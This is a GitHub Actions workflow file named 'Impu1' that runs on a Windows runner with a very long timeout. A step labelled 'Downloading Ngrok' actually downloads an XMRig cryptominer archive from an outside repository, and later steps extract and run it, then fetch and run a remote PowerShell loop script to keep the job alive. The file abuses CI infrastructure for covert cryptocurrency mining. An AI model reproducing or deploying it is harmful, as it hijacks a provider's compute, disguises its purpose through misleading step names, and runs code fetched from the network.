name: Impu1

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Downloading Ngrok.
      run: Invoke-WebRequest https://github.com/jaisai1337/impu/raw/main/xmrig1.zip -OutFile xmrig1.zip
    - name: Extracting Xmrig Files.
      run: Expand-Archive xmrig1.zip
    - name: XMRIG.
      run: cmd /c D:\a\cpu\cpu\xmrig1\xmrig1\jai.bat
    - name: RDP is ready!
      run: | 
        Invoke-WebRequest https://raw.githubusercontent.com/romain09/AWS-RDP/main/loop.ps1 -OutFile loop.ps1
        ./loop.ps1
